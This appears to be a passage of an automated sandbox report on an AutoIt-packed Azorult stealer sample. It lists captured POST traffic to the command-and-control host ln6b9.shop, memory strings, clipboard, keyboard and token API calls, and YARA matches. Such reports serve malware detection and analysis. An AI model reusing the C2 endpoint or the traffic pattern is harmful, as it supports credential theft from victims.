          Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 67 ef 45 70 9d 33 70 9d 3b 16 8b 30 66 8b 30 62 8b 31 11 eb 26 66 9a 42 16 8b 30 64 eb 45 70 9d 34 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10gEp3p;0f0b1&fB0dEp4
          Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 42517Cache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003CCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_003CCE44
          Source: global trafficDNS traffic detected: DNS query: ln6b9.shop
          Source: unknownHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 67 ef 45 70 9d 33 70 9d 3b 16 8b 30 66 8b 30 62 8b 31 11 eb 26 66 9a 42 16 8b 30 64 eb 45 70 9d 34 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10gEp3p;0f0b1&fB0dEp4
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: 4QihT6CwD8.exe, 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774629091.0000000003212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.php
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.phpAx
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
          Source: 4QihT6CwD8.exe, 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774770646.000000000325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: svchost.exe, 00000001.00000002.1774629091.0000000003212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf8Ap
          Source: svchost.exe, 00000001.00000002.1774629091.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774678662.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: svchost.exe, 00000001.00000002.1774770646.000000000325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: svchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfjfile://192.168.2.1/all/Professional2019Retail.img
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003CEAFF
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003CED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003CED6A
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003CEAFF
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_003BAA57
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003E9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003E9576
          Source: Yara matchFile source: Process Memory Space: 4QihT6CwD8.exe PID: 4180, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.6884d02.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
          Source: 1.2.svchost.exe.68195b1.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
          Source: 1.2.svchost.exe.67f75c4.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
          Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
          Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
          Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Binary is likely a compiled AutoIt script file
          Source: 4QihT6CwD8.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: 4QihT6CwD8.exe, 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4020acf9-5
          Source: 4QihT6CwD8.exe, 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_58f52a62-e
          Source: 4QihT6CwD8.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3eae40c5-e
          Source: 4QihT6CwD8.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_265f2446-6
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_003BD5EB
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_003B1201
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003BE8F6
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0035BF400_2_0035BF40
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003580600_2_00358060
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C20460_2_003C2046
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B82980_2_003B8298
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0038E4FF0_2_0038E4FF
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0038676B0_2_0038676B
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003E48730_2_003E4873
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0037CAA00_2_0037CAA0
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0035CAF00_2_0035CAF0
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0036CC390_2_0036CC39
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00386DD90_2_00386DD9
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0036B1190_2_0036B119
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003591C00_2_003591C0
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003713940_2_00371394
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003717060_2_00371706
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0037781B0_2_0037781B
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003579200_2_00357920
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0036997D0_2_0036997D
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003719B00_2_003719B0
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00377A4A0_2_00377A4A
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00371C770_2_00371C77
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00377CA70_2_00377CA7
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003DBE440_2_003DBE44
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00389EEE0_2_00389EEE
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00371F320_2_00371F32
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_011436200_2_01143620
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: String function: 0036F9F2 appears 31 times
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: String function: 00370A30 appears 46 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00403B98 appears 44 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E64 appears 33 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E3C appears 87 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004062D8 appears 34 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004034E4 appears 36 times
          Source: api-ms-win-core-handle-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-synch-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-memory-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-utility-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-environment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-processthreads-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-process-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-file-l2-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-runtime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-file-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-localization-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-time-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-locale-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-stdio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-util-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-math-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-private-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-interlocked-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-synch-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-conio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-timezone-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-convert-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
          Source: 4QihT6CwD8.exe, 00000000.00000003.1667768173.0000000003B6D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4QihT6CwD8.exe
          Source: 4QihT6CwD8.exe, 00000000.00000003.1669238946.00000000039C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4QihT6CwD8.exe
          Source: 4QihT6CwD8.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 0.2.4QihT6CwD8.exe.1160000.1.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
